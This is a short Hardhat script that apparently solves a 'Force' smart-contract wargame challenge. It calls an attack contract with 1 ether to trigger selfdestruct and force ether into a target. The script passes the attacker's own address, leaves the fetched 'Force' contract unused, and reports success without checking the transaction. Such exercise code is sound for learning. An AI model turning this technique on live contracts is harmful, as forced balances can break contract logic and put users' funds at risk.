const { ethers } = require("hardhat")

async function main() {
    const accounts = await ethers.getSigners()
    const deployer = accounts[0]

    const force = await ethers.getContract("Force")
    const forceAttack = await ethers.getContract("ForceAttack")

    const tx = await forceAttack.attack(forceAttack.address, {
        value: ethers.utils.parseUnits(`1`, `ether`),
    })

    console.log(`Self destruct called successfully!`)
}

main()
    .then(() => process.exit(0))
    .catch((error) => {
        console.error(error)
        process.exit(1)
    })
